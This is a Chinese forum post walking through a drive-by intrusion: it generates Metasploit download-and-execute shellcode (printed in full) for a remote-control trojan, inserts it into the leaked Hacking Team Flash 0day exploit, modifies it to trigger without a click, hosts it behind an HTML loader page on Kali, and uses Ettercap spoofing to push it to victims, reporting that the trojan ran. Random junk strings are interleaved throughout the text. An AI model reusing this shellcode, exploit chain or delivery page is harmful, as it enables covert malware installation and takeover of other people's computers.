flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

' F) h/ l/ B; q) v- W. Z 三、flash 0day之手工代码修改制作下载者实例入侵演示 ( @5 x$ ?" ^$ b+ J" W

* ^! T+ ?; t3 u" r" {! H 利用到的工具： - K3 P$ Z# K; t$ _

/ F% h4 n6 t C; _8 f. m! s/ A Msf - y% {- \0 T& V3 u

% S9 t9 n) Z2 W/ ^! b5 V( A. F Ettercap ( L2 O; \& Y% @6 Z' i$ @

$ h* C" C! |9 j3 A% d/ f" ? Adobe Flash CS6 2 U! k o4 S7 N+ o4 q5 O

$ {# R0 `: q* H8 n/ X+ U; d# ]6 D Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 0 \0 t; \$ A( \, E- T# S

5 L. Q! _& H' _0 v: @6 }: e7 _! ? 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options # m \1 P8 `2 y8 G" d3 C: i& C. h1 K

3 s- K A5 o' a/ r6 I6 O" E 如图： 2 k# ^$ k9 `6 l) |, F

; A% Q0 a8 D+ a 4 `1 s8 }% _ |3 Z

" G# \2 v6 K1 Y, q5 A) d * H) i! J; S- Z# D) M

0 v( M& |3 Q- W- b 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: & u0 I) M$ C& i% }

V$ W; g) D2 N s# T Q ~: D3 P* N7 P$ `

4 e9 F/ e3 Z, T4 F8 h # Q5 q$ C$ R$ Y& X

1 O4 g6 f& s8 \* _3 e+ ]' n& f 然后执行generate -t dword生成shellcode，如下： . [ n1 _) O: M* d) f% Q E9 f

( K7 O, O- ]* y) G; ~# H3 S1 f W$ G. Y" z9 U- Z! C$ Z9 Q

- x; K0 y% y6 H9 T/ Q6 `# {# f 复制代码到文本下便于我们一会编辑flash exp，如下： / f5 ~7 v6 c0 `

$ d$ B4 U0 o2 j+ z1 l3 Q+ E 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, : w: |0 s* W1 i1 w3 ~. ~

0 K4 Z# Y# m8 l6 Q/ f8 {& r: h$ h% c 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 4 R) C! ~! Z" g4 R1 W

4 U. n* p4 Q$ U) b: y 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, & j+ o- c4 [' q8 x

2 O4 ]! Q; H. B% O5 o0 E# y 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ( j$ Y; g) b) P% U: u- q8 X4 x

. o+ x: n- x- P/ P; r+ P 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, # M' j- ?' U' r* G

" E3 N) q8 {. h) t5 H. p8 Q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, * u6 s3 z6 T' e

1 Y$ `/ R& W. x* n* X$ e4 N; D5 b& T 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 8 X3 h j+ m# Y$ s- \3 C

' P! K+ P% x$ L( Z/ f 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 6 W( o* M7 O+ X9 z8 p

$ ^) @. N" T* n; x7 W 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, . Z% [9 B! f" D/ d

/ k i) l1 N7 P% F3 i9 Q 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' U* ^( u1 j% ^6 B3 W

$ T0 r( W r0 m& H+ @3 L( { 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # l0 q% i+ a" l* B7 }2 {7 C

/ X" b4 V$ b5 ^% k2 ~4 j: N 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 5 p" [( v( H, K1 b

1 y/ Q7 X- k; d4 E7 [ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 U$ g9 P& Y3 Z# n! v+ p

! T) e! r+ V: e6 P6 Z 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 * C& \+ N0 `2 {$ f i# s

. o4 t+ T3 [% y2 x ] / q4 r" t1 T, e0 a7 Y

0 I3 g5 I5 E8 N. o5 } + s6 M. z: j! O

- i+ T! |! M7 P: V1 ?, E 下面我们来修改flash 0day exp，需要修改三个文件，分别为： 7 [7 p. H H6 x2 O3 V

' h$ O0 {4 F- ]4 T/ w9 T \* n & A! s7 O8 G2 g; M3 R6 b+ K$ a

1 R$ y' q5 ^; z; B! c 先修改ShellWin32.as，部分源代码如图： + F0 ], {$ V9 r5 O% J2 I! ?2 a6 g0 ]

v7 j7 t* \/ \1 j. n+ w( Y0 k # O7 D" u2 l' k( {# a5 W R. ~

2 B; F. I% H6 v/ I9 q5 \ 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： , d* P/ V4 b5 R

1 Q: `( n8 I0 W& z1 z % j: }* U. t$ G. @

% R. n7 m5 D7 S4 Y/ } 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： ; g' f: ~/ f) b8 I

8 a; U6 U! J6 J+ ]& c/ s2 E ' j7 }6 F( s8 b/ Z! P! ]

& e9 |' m8 t5 W% O 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： * r% |: k' f1 d

# l: N- e) N0 n* t. k2 s% p$ l. a " N0 O* G+ q0 c. R( K

$ o( r; y- k* T0 o$ g6 ]& f 0 b( n) b+ i$ x

$ J. |( D7 i2 X ; {( X$ W5 K2 P) {

. |/ W# l* [' s% @) u& v 然后点保存，下面我们来编译一下，打开 ! B3 N0 _9 B, [8 e& k! [

. t( a7 j% A: {8 b7 S' P! x. m exp1.fla然后点文件-发布，看看编译没错误 * r" Y5 k; l( k& S* X4 N% d) r2 g/ p

" S; i' q, _. Z1 d9 R/ W6 y1 n) d . a! G' m/ J4 S& Z$ p

$ t: K, {& A+ @3 w" p. q/ b3 \ ' u7 L) r* C. e9 }& t$ V

q& S8 }" M9 Y4 D; n " O/ |# O" i$ W

& F9 w7 d$ T; a) C: E" R. N" c, ] I1 } ( |2 Y# Y5 ?# m

$ `. H: w0 W. D: Q8 z 然后我们把生成的 . a7 k3 |% U( H( g% R/ M

- k. z7 p. M3 E0 T5 ] exp1.swf丢到kailinux 的/var/www/html下： . L7 J. N0 `% m2 E1 \% l4 [

- x j A2 q9 U% R& d3 @ 然后把这段代码好好编辑一下 / `9 f8 J' l$ q) S

2 @0 Z+ j# ?0 m5 m8 A 1 d9 J% ?0 `) H

9 Z \7 g2 ^" Z" G 2 \9 G1 d% V' E/ @, h

. V) v" X" a: C# v" s1 \, E . h4 o0 z) K' ^: ?$ e5 x9 l2 j

" v5 g& ^# R+ m1 K . y3 O/ M2 I. {! f5 V3 h, Y

" R& D. L6 k) B* |0 }% x- q / E# i& T5 w; ?; o- {) f; G

0 \- m' u7 ^/ j% h8 K 7 {; H }/ f1 n8 y, @

- y9 A( L3 O7 W. x+ A& L4 H <!DOCTYPE html> 9 d7 i8 c: a5 T7 H- M* s8 ~. l; z

9 F9 |# k: N. J8 I1 {$ r9 N <html> 3 w# {) X+ T6 I8 B$ g$ p

- G7 R/ n% T4 C9 y: P' b <head> , t( X `% e% u, [

6 d" w+ o6 `8 s <meta http-equiv="Content-Type" content="text/html; ' u9 A X$ q, O9 g& L

7 y$ d# U& t9 n; ?) B, G% t charset=utf-8"/> , K5 f) ]- |1 [3 J. ?/ l

- ]8 \- O4 z! x4 }8 f( N7 s </head> T+ E, N4 f7 q( d& c3 c

7 M' O( R$ P, G# B4 e <body> - j( S* ]0 }, }/ {0 E5 w8 T

! A+ B4 z9 W5 c2 o( U: u* q$ K# S <h2> Please wait, the requested page is loading...</h2> 5 J& ?# ]6 D" i* ^- L

9 x% j, c+ E% I9 Z; {% K <br> ( L, Y( S! N& A

) {, l& D# e. l p. a0 E5 D <OBJECT ! L& v3 J) T% ~" `

# t+ @$ j1 h* x3 a& `; \% M+ H classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . K; O6 c6 G$ M: p4 n8 v6 t2 c: O# P5 M

( ^8 b: q D# @" R VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) Y$ I9 Z) `7 Z8 J; H

. @) g J: @: o0 K4 `/ O+ W </body> " ]. p: y5 s* p2 Z0 J, ~4 v4 `! M& X

2 r) a: w- x \ { <script> " L P6 \9 D* S7 }2 n, G7 | i

1 {- H# l& m9 f) q; I* U. I, ]" L4 n setTimeout(function () { 7 ]& j9 _/ g) d+ W4 n' E" W# O

6 x. z1 s+ j6 \2 a/ n 1 D: K8 d/ \" I7 c. @( F

6 H8 a5 D8 z. J, S. S$ z window.location.reload(); ' m4 O. \' Z F' y- D7 s `1 n

+ F! i6 W. ^, R; w" @2 k. |& ^9 W }, 10000); % t) M" P8 l% @) J" q

! E& D3 H; l' E) n9 E% t ' i+ ^2 `3 X' I3 l% d/ o

J" s. ~7 |- r2 J6 K, ]% e </script> ' G `5 I0 ^4 x1 f

. D6 U) T, P0 N1 [" R </html> 5 h7 F% D. p1 n( ~. @/ p

& B3 i7 w3 j Z) @1 V2 A $ C6 p; b' H7 r) Q# w8 C4 v* N

8 B8 C& j) {' w( E: v( x, | 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： ( D+ T* F$ J& d6 O- F3 H+ H

8 ?' t I+ s" m% l( g) h: N2 h8 m . ~! R0 b* d; K+ y( ^5 B9 t3 O7 R+ j& A

' K C" a7 {7 Q1 P x : w/ z# }: b. L; ?+ F

" |4 m+ u/ Q- s- u: Y' r* N5 L 6 |; D, x$ A& C; Q Z Q

! E/ P/ C+ Q% i. k$ |' _3 ~ * g9 O! d: s- |3 o/ ]9 {9 C

0 M8 s* E3 P+ J , j' O9 b P4 M& R% U# C j

0 {$ j% Q9 K4 e8 s# ]: o( s 下面我们用ettercap欺骗如图： 1 O9 Y( h- W: J, A% G0 y' P

, a- Q# |) R8 e. @6 {! P ) G4 `7 c ^6 t

% g: g5 C, ], v0 g / C% D9 B. ?! d) K2 b, e

) U1 c0 a5 u# n9 X* q 下面我们随便访问个网站看看： + V4 T% w: u" X; ?! ]+ C

" @/ z z" F! E' o 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： 3 x# i$ n A7 |# W$ s J' j

* L( ]( V [% H- v ' ^" B" C9 U* [# g2 x

' _3 d; L { r" J0 c2 _$ j6 D) U 我们看另一台， 8 X. w: _& u) T* R, e

7 l8 i5 U5 ^% f5 g/ @ Q! F) F 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 * c* ?9 A+ M/ U% w" {' K- ^

		自动登录	找回密码
密码			立即注册